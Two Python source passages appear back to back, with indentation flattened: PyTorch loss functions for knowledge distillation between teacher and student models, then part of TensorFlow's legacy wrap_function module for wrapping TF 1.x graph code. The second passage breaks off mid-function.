'''
if isinstance(temperature, torch.Tensor) and temperature.dim() > 0:
temperature = temperature.unsqueeze(-1)
beta_logits_T = logits_T / temperature
beta_logits_S = logits_S / temperature
p_T = F.softmax(beta_logits_T, dim=-1)
loss = -(p_T * F.log_softmax(beta_logits_S, dim=-1)).sum(dim=-1).mean()
return loss
def att_mse_loss(attention_S, attention_T, mask=None):
'''
* Calculates the mse loss between `attention_S` and `attention_T`.
* If the `inputs_mask` is given, masks the positions where ``input_mask==0``.
:param torch.Tensor logits_S: tensor of shape (*batch_size*, *num_heads*, *length*, *length*)
:param torch.Tensor logits_T: tensor of shape (*batch_size*, *num_heads*, *length*, *length*)
:param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
if mask is None:
attention_S_select = torch.where(attention_S <= -1e-3, torch.zeros_like(attention_S), attention_S)
attention_T_select = torch.where(attention_T <= -1e-3, torch.zeros_like(attention_T), attention_T)
loss = F.mse_loss(attention_S_select, attention_T_select)
else:
mask = mask.to(attention_S).unsqueeze(1).expand(-1, attention_S.size(1), -1) # (bs, num_of_heads, len)
valid_count = torch.pow(mask.sum(dim=2), 2).sum()
loss = (F.mse_loss(attention_S, attention_T, reduction='none') * mask.unsqueeze(-1) * mask.unsqueeze(
2)).sum() / valid_count
return loss
def att_mse_sum_loss(attention_S, attention_T, mask=None):
'''
* Calculates the mse loss between `attention_S` and `attention_T`.
* If the the shape is (*batch_size*, *num_heads*, *length*, *length*), sums along the `num_heads` dimension and then calcuates the mse loss between the two matrices.
* If the `inputs_mask` is given, masks the positions where ``input_mask==0``.
:param torch.Tensor logits_S: tensor of shape (*batch_size*, *num_heads*, *length*, *length*) or (*batch_size*, *length*, *length*)
:param torch.Tensor logits_T: tensor of shape (*batch_size*, *num_heads*, *length*, *length*) or (*batch_size*, *length*, *length*)
:param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
if len(attention_S.size()) == 4:
attention_T = attention_T.sum(dim=1)
attention_S = attention_S.sum(dim=1)
if mask is None:
attention_S_select = torch.where(attention_S <= -1e-3, torch.zeros_like(attention_S), attention_S)
attention_T_select = torch.where(attention_T <= -1e-3, torch.zeros_like(attention_T), attention_T)
loss = F.mse_loss(attention_S_select, attention_T_select)
else:
mask = mask.to(attention_S)
valid_count = torch.pow(mask.sum(dim=1), 2).sum()
loss = (F.mse_loss(attention_S, attention_T, reduction='none') * mask.unsqueeze(-1) * mask.unsqueeze(
1)).sum() / valid_count
return loss
def att_ce_loss(attention_S, attention_T, mask=None):
'''
* Calculates the cross-entropy loss between `attention_S` and `attention_T`, where softmax is to applied on ``dim=-1``.
* If the `inputs_mask` is given, masks the positions where ``input_mask==0``.
:param torch.Tensor logits_S: tensor of shape (*batch_size*, *num_heads*, *length*, *length*)
:param torch.Tensor logits_T: tensor of shape (*batch_size*, *num_heads*, *length*, *length*)
:param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
probs_T = F.softmax(attention_T, dim=-1)
if mask is None:
probs_T_select = torch.where(attention_T <= -1e-3, torch.zeros_like(attention_T), probs_T)
loss = -((probs_T_select * F.log_softmax(attention_S, dim=-1)).sum(dim=-1)).mean()
else:
mask = mask.to(attention_S).unsqueeze(1).expand(-1, attention_S.size(1), -1) # (bs, num_of_heads, len)
loss = -((probs_T * F.log_softmax(attention_S, dim=-1) * mask.unsqueeze(2)).sum(
dim=-1) * mask).sum() / mask.sum()
return loss
def att_ce_mean_loss(attention_S, attention_T, mask=None):
'''
* Calculates the cross-entropy loss between `attention_S` and `attention_T`, where softmax is to applied on ``dim=-1``.
* If the shape is (*batch_size*, *num_heads*, *length*, *length*), averages over dimension `num_heads` and then computes cross-entropy loss between the two matrics.
* If the `inputs_mask` is given, masks the positions where ``input_mask==0``.
:param torch.tensor logits_S: tensor of shape (*batch_size*, *num_heads*, *length*, *length*) or (*batch_size*, *length*, *length*)
:param torch.tensor logits_T: tensor of shape (*batch_size*, *num_heads*, *length*, *length*) or (*batch_size*, *length*, *length*)
:param torch.tensor mask: tensor of shape (*batch_size*, *length*)
'''
if len(attention_S.size()) == 4:
attention_S = attention_S.mean(dim=1) # (bs, len, len)
attention_T = attention_T.mean(dim=1)
probs_T = F.softmax(attention_T, dim=-1)
if mask is None:
probs_T_select = torch.where(attention_T <= -1e-3, torch.zeros_like(attention_T), probs_T)
loss = -((probs_T_select * F.log_softmax(attention_S, dim=-1)).sum(dim=-1)).mean()
else:
mask = mask.to(attention_S)
loss = -((probs_T * F.log_softmax(attention_S, dim=-1) * mask.unsqueeze(1)).sum(
dim=-1) * mask).sum() / mask.sum()
return loss
def hid_mse_loss(state_S, state_T, mask=None):
'''
* Calculates the mse loss between `state_S` and `state_T`, which are the hidden state of the models.
* If the `inputs_mask` is given, masks the positions where ``input_mask==0``.
* If the hidden sizes of student and teacher are different, 'proj' option is required in `inetermediate_matches` to match the dimensions.
:param torch.Tensor state_S: tensor of shape (*batch_size*, *length*, *hidden_size*)
:param torch.Tensor state_T: tensor of shape (*batch_size*, *length*, *hidden_size*)
:param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
if mask is None:
loss = F.mse_loss(state_S, state_T)
else:
mask = mask.to(state_S)
valid_count = mask.sum() * state_S.size(-1)
loss = (F.mse_loss(state_S, state_T, reduction='none') * mask.unsqueeze(-1)).sum() / valid_count
return loss
def cos_loss(state_S, state_T, mask=None):
'''
* Computes the cosine similarity loss between the inputs. This is the loss used in DistilBERT, see `DistilBERT <https://arxiv.org/abs/1910.01108>`_
* If the `inputs_mask` is given, masks the positions where ``input_mask==0``.
* If the hidden sizes of student and teacher are different, 'proj' option is required in `inetermediate_matches` to match the dimensions.
:param torch.Tensor state_S: tensor of shape (*batch_size*, *length*, *hidden_size*)
:param torch.Tensor state_T: tensor of shape (*batch_size*, *length*, *hidden_size*)
:param torch.Tensor mask: tensor of shape (*batch_size*, *length*)
'''
if mask is None:
state_S = state_S.view(-1, state_S.size(-1))
state_T = state_T.view(-1, state_T.size(-1))
else:
mask = mask.to(state_S).unsqueeze(-1).expand_as(state_S) # (bs,len,dim)
state_S = torch.masked_select(state_S, mask).view(-1, mask.size(-1)) # (bs * select, dim)
state_T = torch.masked_select(state_T, mask).view(-1, mask.size(-1)) # (bs * select, dim)
target = state_S.new(state_S.size(0)).fill_(1)
loss = F.cosine_embedding_loss(state_S, state_T, target, reduction='mean')
return loss
def pkd_loss(state_S, state_T, mask=None):
'''
* Computes normalized vector mse loss at position 0 along `length` dimension. This is the loss used in BERT-PKD, see `Patient Knowledge Distillation for BERT Model Compression <https://arxiv.org/abs/1908.09355>`_.
* If the hidden sizes of student and teacher are different, 'proj' option is required in `inetermediate_matches` to match the dimensions.
:param torch.Tensor state_S: tensor of shape (*batch_size*, *length*, *hidden_size*)
:param torch.Tensor state_T: tensor of shape (*batch_size*, *length*, *hidden_size*)
:param mask: not used.
'''
cls_T = state_T[:, 0] # (batch_size, hidden_dim)
cls_S = state_S[:, 0] # (batch_size, hidden_dim)
normed_cls_T = cls_T / torch.norm(cls_T, dim=1, keepdim=True)
normed_cls_S = cls_S / torch.norm(cls_S, dim=1, keepdim=True)
loss = (normed_cls_S - normed_cls_T).pow(2).sum(dim=-1).mean()
return loss
def fsp_loss(state_S, state_T, mask=None):
r'''
* Takes in two lists of matrics `state_S` and `state_T`. Each list contains two matrices of the shape (*batch_size*, *length*, *hidden_size*). Computes the similarity matrix between the two matrices in `state_S` ( with the resulting shape (*batch_size*, *hidden_size*, *hidden_size*) ) and the ones in B ( with the resulting shape (*batch_size*, *hidden_size*, *hidden_size*) ), then computes the mse loss between the similarity matrices:
.. math::
loss = mean((S_{1}^T \cdot S_{2} - T_{1}^T \cdot T_{2})^2)
* It is a Variant of FSP loss in `A Gift from Knowledge Distillation: Fast Optimization, Network Minimization and Transfer Learning <http://openaccess.thecvf.com/content_cvpr_2017/papers/Yim_A_Gift_From_CVPR_2017_paper.pdf>`_.
* If the `inputs_mask` is given, masks the positions where ``input_mask==0``.
* If the hidden sizes of student and teacher are different, 'proj' option is required in `inetermediate_matches` to match the dimensions.
:param torch.tensor state_S: list of two tensors, each tensor is of the shape (*batch_size*, *length*, *hidden_size*)
:param torch.tensor state_T: list of two tensors, each tensor is of the shape (*batch_size*, *length*, *hidden_size*)
:param torch.tensor mask: tensor of the shape (*batch_size*, *length*)
Example in `intermediate_matches`::
intermediate_matches = [
{'layer_T':[0,0], 'layer_S':[0,0], 'feature':'hidden','loss': 'fsp', 'weight' : 1, 'proj':['linear',384,768]},
...]
'''
if mask is None:
state_S_0 = state_S[0] # (batch_size , length, hidden_dim)
state_S_1 = state_S[1] # (batch_size, length, hidden_dim)
state_T_0 = state_T[0]
state_T_1 = state_T[1]
gram_S = torch.bmm(state_S_0.transpose(1, 2), state_S_1) / state_S_1.size(
1) # (batch_size, hidden_dim, hidden_dim)
gram_T = torch.bmm(state_T_0.transpose(1, 2), state_T_1) / state_T_1.size(1)
else:
mask = mask.to(state_S[0]).unsqueeze(-1)
lengths = mask.sum(dim=1, keepdim=True)
state_S_0 = state_S[0] * mask
state_S_1 = state_S[1] * mask
state_T_0 = state_T[0] * mask
state_T_1 = state_T[1] * mask
gram_S = torch.bmm(state_S_0.transpose(1, 2), state_S_1) / lengths
gram_T = torch.bmm(state_T_0.transpose(1, 2), state_T_1) / lengths
loss = F.mse_loss(gram_S, gram_T)
return loss
def mmd_loss(state_S, state_T, mask=None):
r'''
* Takes in two lists of matrices `state_S` and `state_T`. Each list contains 2 matrices of the shape (*batch_size*, *length*, *hidden_size*). `hidden_size` of matrices in `State_S` doesn't need to be the same as that of `state_T`. Computes the similarity matrix between the two matrices in `state_S` ( with the resulting shape (*batch_size*, *length*, *length*) ) and the ones in B ( with the resulting shape (*batch_size*, *length*, *length*) ), then computes the mse loss between the similarity matrices:
.. math::
loss = mean((S_{1} \cdot S_{2}^T - T_{1} \cdot T_{2}^T)^2)
* It is a Variant of the NST loss in `Like What You Like: Knowledge Distill via Neuron Selectivity Transfer <https://arxiv.org/abs/1707.01219>`_
* If the `inputs_mask` is given, masks the positions where ``input_mask==0``.
:param torch.tensor state_S: list of two tensors, each tensor is of the shape (*batch_size*, *length*, *hidden_size*)
:param torch.tensor state_T: list of two tensors, each tensor is of the shape (*batch_size*, *length*, *hidden_size*)
:param torch.tensor mask: tensor of the shape (*batch_size*, *length*)
Example in `intermediate_matches`::
intermediate_matches = [
{'layer_T':[0,0], 'layer_S':[0,0], 'feature':'hidden','loss': 'nst', 'weight' : 1},
...]
'''
state_S_0 = state_S[0] # (batch_size , length, hidden_dim_S)
state_S_1 = state_S[1] # (batch_size , length, hidden_dim_S)
state_T_0 = state_T[0] # (batch_size , length, hidden_dim_T)
state_T_1 = state_T[1] # (batch_size , length, hidden_dim_T)
if mask is None:
gram_S = torch.bmm(state_S_0, state_S_1.transpose(1, 2)) / state_S_1.size(2) # (batch_size, length, length)
gram_T = torch.bmm(state_T_0, state_T_1.transpose(1, 2)) / state_T_1.size(2)
loss = F.mse_loss(gram_S, gram_T)
else:
mask = mask.to(state_S[0])
valid_count = torch.pow(mask.sum(dim=1), 2).sum()
gram_S = torch.bmm(state_S_0, state_S_1.transpose(1, 2)) / state_S_1.size(1) # (batch_size, length, length)
gram_T = torch.bmm(state_T_0, state_T_1.transpose(1, 2)) / state_T_1.size(1)
loss = (F.mse_loss(gram_S, gram_T, reduction='none') * mask.unsqueeze(-1) * mask.unsqueeze(
1)).sum() / valid_count
return loss
class KnowledgeDistillationLoss(AutoConfigurable):
def __init__(self, name) -> None:
super().__init__()
self.name = name
import sys
thismodule = sys.modules[__name__]
self._loss = getattr(thismodule, name)
def __call__(self, *args, **kwargs):
return self._loss(*args, **kwargs)
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=unidiomatic-typecheck
"""Prototype decorator for defining legacy-graph-mode functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import weakref
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import struct_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import lift_to_graph
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import nested_structure_coder
from tensorflow.python.training.tracking import data_structures
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import tf_export
class VariableHolder(object):
"""Holds variables for a python function."""
def __init__(self, fn=None, share_variables=False):
self._fn = fn
self._share_variables = share_variables
self._variables_by_name = data_structures.Mapping()
@property
def variables(self):
return self._variables_by_name
def variable_creator_scope(self, next_creator, **kwargs):
"""Creates variables & adds them to collections to match legacy code."""
collections = kwargs.pop("collections", None)
v = None
# Get expected variable name.
with ops.name_scope(kwargs.get("name", None), "Variable") as name:
variable_name = ops.name_from_scope_name(name)
kwargs["name"] = name
if self._share_variables:
v = self._variables_by_name.get(variable_name, None)
if v is None:
v = next_creator(**kwargs)
self._variables_by_name[variable_name] = v
if collections is None:
collections = [ops.GraphKeys.GLOBAL_VARIABLES]
if v.trainable and ops.GraphKeys.TRAINABLE_VARIABLES not in collections:
collections = list(collections) + [ops.GraphKeys.TRAINABLE_VARIABLES]
ops.add_to_collections(collections, v)
return v
def __call__(self, *args, **kwargs):
return self.call_with_variable_creator_scope(self._fn)(*args, **kwargs)
def call_with_variable_creator_scope(self, fn):
def wrapped(*args, **kwargs):
with variable_scope.variable_creator_scope(self.variable_creator_scope):
return fn(*args, **kwargs)
return wrapped
def _get_element_from_tensor_info(tensor_info, graph):
"""Simplified copy of the deprecated `get_tensor_from_tensor_info`."""
encoding = tensor_info.WhichOneof("encoding")
if encoding == "name":
# We may get operations here in some cases. TensorInfo is a bit of a
# misnomer if so.
return graph.as_graph_element(tensor_info.name)
elif encoding == "coo_sparse":
return sparse_tensor.SparseTensor(
graph.get_tensor_by_name(tensor_info.coo_sparse.indices_tensor_name),
graph.get_tensor_by_name(tensor_info.coo_sparse.values_tensor_name),
graph.get_tensor_by_name(
tensor_info.coo_sparse.dense_shape_tensor_name))
elif encoding == "composite_tensor":
struct_coder = nested_structure_coder.StructureCoder()
spec_proto = struct_pb2.StructuredValue(
type_spec_value=tensor_info.composite_tensor.type_spec)
spec = struct_coder.decode_proto(spec_proto)
components = [graph.get_tensor_by_name(component.name) for component in
tensor_info.composite_tensor.components]
return spec._from_components(components) # pylint: disable=protected-access
else:
raise ValueError("Invalid TensorInfo.encoding: %s" % encoding)
def _lift_single_variable(old_variable, graph, variable_holder):
"""Lifts `old_variable` out of the `FuncGraph` `graph`."""
new_variable = resource_variable_ops.UninitializedVariable(
shape=old_variable.shape,
dtype=old_variable.dtype,
name=old_variable.op.name,
trainable=old_variable.trainable,
extra_handle_data=old_variable.handle)
new_variable._initializer_op = old_variable._initializer_op # pylint: disable=protected-access
graph.add_capture(new_variable.handle, old_variable.handle)
# Now that we've added the new variable to graph.captures,
# graph.capture will use that cached value and do some post-processing
# on the capture like recording it on the tape.
graph.capture(new_variable.handle)
# pylint: disable=protected-access
variable_name = new_variable.name.split(":")[0]
variable_holder._variables_by_name[variable_name] = new_variable
graph._weak_variables.append(weakref.ref(new_variable))
# pylint: enable=protected-access
graph.watch_variable(new_variable)
return new_variable
def _lift_unlifted_variables(graph, variable_holder):
"""Finds resource variables and lifts them into the outer context.
When we import a GraphDef inside a wrap_function, no Python graph building
code runs. This means we get VarHandleOps which create variable resources,
but no corresponding Python objects. Leaving them like this works but gives
the user no way to interact with or modify the variables outside the graph.
This method searches for variables and lifts them out as regular variable
objects when possible, indicating to the FuncGraph that they are captures.
Args:
graph: The FuncGraph to lift variables from.
variable_holder: A VariableHolder to record the lifted variables in.
"""
with graph.as_default():
global_collection_variables = ops.get_collection(
ops.GraphKeys.GLOBAL_VARIABLES)
local_collection_variables = ops.get_collection(
ops.GraphKeys.LOCAL_VARIABLES)
existing_captures = {id(c) for c in graph.internal_captures}
lifted_variables = {}
def _should_lift_variable(v):
return ((v._in_graph_mode # pylint: disable=protected-access
and v.graph.building_function)
and isinstance(v, resource_variable_ops.BaseResourceVariable)
and id(v.handle) not in existing_captures)
for old_variable in global_collection_variables:
if _should_lift_variable(old_variable):
new_variable = _lift_single_variable(
old_variable, graph, variable_holder)
lifted_variables[id(old_variable)] = new_variable
existing_captures.add(id(old_variable.handle))
for old_variable in local_collection_variables:
if _should_lift_variable(old_variable):
new_variable = _lift_single_variable(
old_variable, graph, variable_holder)
lifted_variables[id(old_variable)] = new_variable
existing_captures.add(id(old_variable.handle))
if new_variable._in_graph_mode: # pylint: disable=protected-access
outer_graph = new_variable.graph
# Variables are added to the global collection by default. In this
# case we only want the variable in the local collection, so we'll pop
# it out.
global_collection = outer_graph.get_collection_ref(
ops.GraphKeys.GLOBAL_VARIABLES)
global_collection.remove(new_variable)
outer_graph.add_to_collection(
ops.GraphKeys.LOCAL_VARIABLES, new_variable)
# Update the FuncGraph's collections, partly for the user and partly so this
# function is idempotent when it runs again in prune() calls.
for collection_name in [
ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.LOCAL_VARIABLES
]:
mutable_collection = ops.get_collection_ref(collection_name)
for index, current in enumerate(mutable_collection):
mutable_collection[index] = lifted_variables.get(id(current), current)
if not resource_variable_ops.is_resource_variable(
mutable_collection[index]):
logging.warning(
"Unable to create a python object for variable {} because it is "
"a reference variable. It may not be visible to training APIs. "
"If this is a problem, consider rebuilding the SavedModel after "
"running tf.compat.v1.enable_resource_variables().".format(
mutable_collection[index]))
# TODO(allenl): make this trackable
class WrappedFunction(function.ConcreteFunction):
"""Wraps a tf V1 piece of code in a function."""
def __init__(self, fn_graph, variable_holder, attrs=None, signature=None):
self._variable_holder = variable_holder
_lift_unlifted_variables(fn_graph, variable_holder)
# We call __init__ after lifting variables so that the function's signature
# properly reflects the new captured inputs.
for f in fn_graph.as_graph_def().library.function:
context.context().add_function_def(f)
super(WrappedFunction, self).__init__(
fn_graph, attrs=attrs, signature=signature)
def prune(self, feeds, fetches, name=None, input_signature=None):
"""Extract a subgraph of this function's underlying graph.
Wraps the subgraph in a new `WrappedFunction` object.
Args:
feeds: Input tensors to the subgraph to extract, as `Tensor` objects.
fetches: Possibly-nested Python data structure containing information
about outputs of the target subgraph. Each entry can either be a
`Tensor` object (for data outputs), an `Operation` object (for control
outputs), or a `TensorInfo` proto. Any additional shape/dtype
information provided in a `TensorInfo` and not present in the original
graph will be added to the returned subgraph.
name: (optional) Name to give to the underlying `FuncGraph` of the
returned object. If no name is provided, the graph's name will be
`"pruned"`.
input_signature: (optional) possibly-nested Python data structure
containing `TensorSpec` objects, with which to populate the returned
functions's `FuncGraph`'s `structured_input_signature` field.
Returns:
A new `WrappedFunction` object containing a copy of the portion of this
object's graph that goes from `feeds` to `fetches`.
"""
# TODO(b/129646028): Add support for CompositeTensors.
name = name or "pruned"
flat_feeds = nest.flatten(feeds, expand_composites=True)
flat_feeds = [self.graph.as_graph_element(t) for t in flat_feeds]
for f in flat_feeds:
if not isinstance(f, ops.Tensor):
raise ValueError("Feeds must be tensors.")
# Ignoring all feeds that are captures allows prune to be called
# using wrapped_func.inputs even when it uses variables
internal_captures = {id(c) for c in self.graph.internal_captures}
flat_feeds = [f for f in flat_feeds if id(f) not in internal_captures]
operation_fetches = []
tensor_fetches = []
tensor_infos = []
def _fetch_preprocesing_callback(fetch):
"""Extract out lists of ops, tensors, and tensor type info.
Turns TensorInfos into Tensors in the original `fetches` structure.
Also extracts ops from `fetches`.
Args:
fetch: The fetch to preprocess: Tensor, TensorInfo, or Operation, or
string identifying a Tensor or Operation.
Returns:
`fetch` converted to a Tensor.
"""
if isinstance(fetch, ops.Operation):
operation_fetches.append(fetch)
return fetch
elif isinstance(fetch, meta_graph_pb2.TensorInfo):
tensor_infos.append(fetch)
decoded = _get_element_from_tensor_info(fetch, self._func_graph)
if (tensor_util.is_tensor(decoded) or
isinstance(decoded, composite_tensor.CompositeTensor)):
tensor_fetches.append(decoded)
else:
operation_fetches.append(decoded)
return decoded
elif isinstance(fetch, (ops.Tensor, composite_tensor.CompositeTensor)):
tensor_fetches.append(fetch)
return fetch
else:
graph_element = self.graph.as_graph_element(fetch)
return _fetch_preprocesing_callback(graph_element)
fetches = nest.map_structure(_fetch_preprocesing_callback, fetches)
# Expand composite tensors into their component dense Tensors.
tensor_fetches = nest.flatten(tensor_fetches, expand_composites=True)
for f in (flat_feeds + tensor_fetches + operation_fetches):
if f.graph is not self._func_graph:
raise ValueError("Can only prune function whose feeds and fetches "
"are from this graph (%s). Input %s is from graph %s" %
(self._func_graph, f, f.graph))
with self._func_graph.as_default():
pruned_graph = func_graph.FuncGraph(name)
lift_map = lift_to_graph.lift_to_graph(
operation_fetches + tensor_fetches,
pruned_graph,
sources=flat_feeds + self.graph.internal_captures)
# Note that we add the component tensors of any composite tensors to the
# returned function's outputs list; the list must contain these component
# tensors, or the function's sparse outputs won't work properly.
pruned_graph.outputs.extend(lift_map[x] for x in tensor_fetches)
pruned_graph.control_outputs.extend(
[lift_map[operation] for operation in operation_fetches])
pruned_graph.inputs.extend(lift_map[x] for x in flat_feeds)
for external_capture, internal_capture in self.graph.captures:
pruned_graph.add_capture(external_capture, lift_map[internal_capture])
for ti in tensor_infos:
if ti.WhichOneof("encoding") == "name": # Dense tensors only
t = pruned_graph.as_graph_element(ti.name)
if tensor_util.is_tensor(t):
t.set_shape(tensor_shape.TensorShape(ti.tensor_shape))
# pylint: disable=protected-access
for f in self.graph._functions.values():
pruned_graph._add_function(f)
# pylint: enable=protected-access
pruned_graph.variables = self.graph.variables
def _structured_output_mapping(fetched):
"""callback for `nest.map_structure()`"""
lifted = lift_map[fetched]
if isinstance(lifted, ops.Operation):
return None
return lifted
# expand_composites=True here causes composite tensors to be expanded
# into their component dense Tensors, mapped to the new graph, and then
# reconstituted into their original composite form.
pruned_graph.structured_outputs = nest.map_structure(
_structured_output_mapping, fetches, expand_composites=True)
pruned_graph.structured_input_signature = input_signature
pruned_fn = WrappedFunction(
pruned_graph, variable_holder=self._variable_holder)
pruned_fn._num_positional_args = len(flat_feeds) # pylint: disable=protected-access
# TODO(kathywu): Enable keyword arguments if an input signature is specified
pruned_fn._arg_keywords = [tensor.op.name for tensor in flat_feeds] # pylint: disable=protected-access
return pruned_fn
def _filter_returned_ops(fn):
"""Filtering out any ops returned by function.
Args:
fn: a function
Returns:
A tuple of (
Wrapped function that returns `None` in place of any ops,
dict that maps the index in the flat output structure to the returned op
)
"""
returned_ops = {}
def wrap_and_filter_returned_ops(*args, **kwargs):
outputs = fn(*args, **kwargs)
flat_outputs = nest.flatten(outputs)
for n in range(len(flat_outputs)):
output = flat_outputs[n]
if isinstance(output, ops.Operation):
returned_ops[n] = output
flat_outputs[n] = None
return nest.pack_sequence_as(outputs, flat_outputs)
return wrap_and_filter_returned_ops, returned_ops
class WrappedGraph(object):
"""Class for wrapping multiple TF 1.X functions in a single graph.
Maintains a dictionary mapping names to wrapped functions. See
`tf.compat.v1.wrap_function` to learn more about wrapping V1 functions.
Functions wrapped using this class have access to variables and collections
created in other wrapped functions, using the standard TF 1.X API (
`tf.compat.v1.get_variable` or
`tf.compat.v1.get_default_graph().get_collection(...)`)
Outside a function, variables and collections may be accessed using the
`variables` and `graph` properties.
Example:
```
def add_v1(x):
with tf.compat.v1.variable_scope('vars', reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable('v', shape=[], dtype=tf.int32)
return v + x
def increment_var_v1(x):
with tf.compat.v1.variable_scope('vars', reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable('v', shape=[], dtype=tf.int32)
return v.assign_add(x)
g = WrappedGraph()
add = g.wrap_function(add_v1, [tf.TensorSpec([], tf.int32)])
increment_var = g.wrap_function(increment_var_v1,
[tf.TensorSpec([], tf.int32)])
assert len(g.variables) == 1
assert g.variables[0].numpy() == 0
increment_var(tf.constant(5))
assert g.variables[0].numpy() == 5
```
"""
def __init__(self, variable_holder=None, **kwargs):
self._variable_holder = (
variable_holder or VariableHolder(share_variables=True))
name = kwargs.pop("name", "wrapped_function_graph")
# Always start with empty collections, unless otherwise specified. Setting
# `collections=None` will copy the collections from the outer graph.
collections = kwargs.pop("collections", {})
self.graph = func_graph.FuncGraph(name, collections=collections, **kwargs)
self._wrapped_function = WrappedFunction(self.graph, self._variable_holder)
self._functions = {}
@property
def functions(self):
return self._functions
@property
def variables(self):
return self._variable_holder.variables
def wrap_function(self, fn, signature, name=None):
"""Wraps a TF 1.X function and returns an eager-compatible function.
All functions wrapped in the same `WrappedGraph` will have access to the
same graph (`tf.compat.v1.get_default_graph` to get the graph object
within a function, or `WrappedGraph.graph` to get the graph outside a
function). Variables created within the function will be added to the
`variables` list.
Function inputs: All inputs to the function must be tensors (nested ok),
with their shapes and dtypes defined in the `signature` argument.
Function outputs:
* The 1.X function may return tensors, variables, and ops. The wrapped
eager-compatible function will always return tensors in the same nested
structure.
* Variables are replaced with a tensor containing the latest read values.
* Returned ops are executed, and replaced with None.
* The order of op execution and variable reads in the return is
nondeterministic. For example:
```
def update_var(x):
v = tf.Variable(0)
op = tf.compat.v1.assign(v, x).op
return v, op
g = WrappedGraph()
fn = g.wrap_function(update_var)
read_value, _ = fn(tf.constant(3))
print(read_value.numpy()) # could be 0 or 3
print(g.variables[0].numpy()) # always 3
```
To ensure that ops in the function are executed (e.g. ops added to the
`tf.GraphKeys.UPDATE_OPS` collection), include them in the function returns.
Args:
fn: a 1.X tensorflow function.
signature: a possibly nested sequence of `TensorSpecs` specifying the
shapes and dtypes of the arguments.
name: an optional string name for the function. The function will be saved
with key `name` in the `functions` dictionary.
Returns:
An eager-compatible function.
"""
return self._wrap_function(fn, signature=signature, name=name)
def _wrap_function(self,
fn,
args=None,
kwargs=None,
signature=None,
name=None):
"""Internal wrap function method with extended func_graph arguments."""
fn_with_filter_and_scope, returned_ops = _filter_returned_ops(
self._variable_holder.call_with_variable_creator_scope(fn))
func_graph.func_graph_from_py_func(
None, # Name is unused.
fn_with_filter_and_scope,
args=args,
kwargs=kwargs,
signature=signature,
add_control_dependencies=False,
func_graph=self.graph)
# This code relies on questional behavior from `func_graph_from_py_func`.
# If an existing FuncGraph is passed into the `func_graph` arg, the inputs
# and structured outputs are overwritten. Pretty sure this is a bug,
# because structured outputs doesn't match up with the outputs...
fn_inputs = self.graph.inputs[:-len(self.graph.captures)]
# Return filtered ops to the flattened outputs.
flat_fn_outputs = nest.flatten(self.graph.structured_outputs)
for index, op in returned_ops.items():
flat_fn_outputs[index] = op
fn_outputs = nest.pack_sequence_as(self.graph.structured_outputs,
flat_fn_outputs)
name = name or fn.__name__
wrapped_function = self._wrapped_function.prune(
fn_inputs, fn_outputs, name, self.graph.structured_input_signature)
self._functions[name] = wrapped_function
return wrapped_function
@tf_export(v1=["wrap_function"])
def wrap_function(fn, signature, name=None):
"""Wraps the TF 1.x function fn into a graph function.
The python function `fn` will be called once with symbolic arguments specified
in the `signature`, traced, and turned into a graph function. Any variables
created by `fn` will be owned by the object returned by `wrap_function`. The
resulting graph function can be called with tensors which match the
signature.
```python
def f(x, do_add):
v = tf.Variable(5.0)
if do_add:
op = v.assign_add(x)
else:
op = v.assign_sub(x)
with tf.control_dependencies([op]):
return v.read_value()
f_add = tf.compat.v1.wrap_function(f, [tf.TensorSpec((), tf.float32), True])
assert float(f_add(1.0)) == 6.0
assert float(f_add(1.0)) == 7.0
# Can call tf.compat.v1.wrap_function again to get a new trace, a new set
# of variables, and possibly different non-template arguments.
f_sub= tf.compat.v1.wrap_function(f, [tf.TensorSpec((), tf.float32), False])
assert float(f_sub(1.0)) == 4.0
assert float(f_sub(1.0)) == 3.0
```
Both `tf.compat.v1.wrap_function` and `tf.function` create a callable
TensorFlow graph. But while `tf.function` runs all stateful operations
(e.g. `tf.print`) and sequences operations to provide the same semantics as
eager execution, `wrap_function` is closer to the behavior of `session.run` in
TensorFlow 1.x. It will not run any operations unless they are required to
compute the function's outputs, either through a data dependency or a control
dependency. Nor will it sequence operations.
Unlike `tf.function`, `wrap_function` will only trace the Python function
once. As with placeholders in TF 1.x, shapes and dtypes must be provided to
`wrap_function`'s `signature` argument.
Since it is only traced once, variables and state may be created inside the
function and owned by the function wrapper object.
Args:
fn: python function to be wrapped
signature: the placeholder and python arguments to be passed to the wrapped
function
name: Optional. The name of the function.
Returns:
the wrapped graph function.
"""
holder = VariableHolder(fn)
func_graph_name = "wrapped_function"
if name is not None:
func_graph_name = "wrapped_function_" + name
return WrappedFunction(
func_graph.func_graph_from_py_func(
func_graph_name,
holder,
args=None,
kwargs=None,
signature=signature,
add_control_dependencies=False,
collections={}),
variable_holder=holder,
signature=signature)
def function_from_graph_def(graph_def, inputs, outputs):
"""Creates a ConcreteFunction from a GraphDef.
Args:
graph_def: A GraphDef to make a function out of.
inputs: A Tensor name or nested structure of names in `graph_def` which
should be inputs to the function.
outputs: A Tensor name or nested structure of names in `graph_def` which
should be outputs of the function.
Returns:
A ConcreteFunction.
"""
def _imports_graph_def():
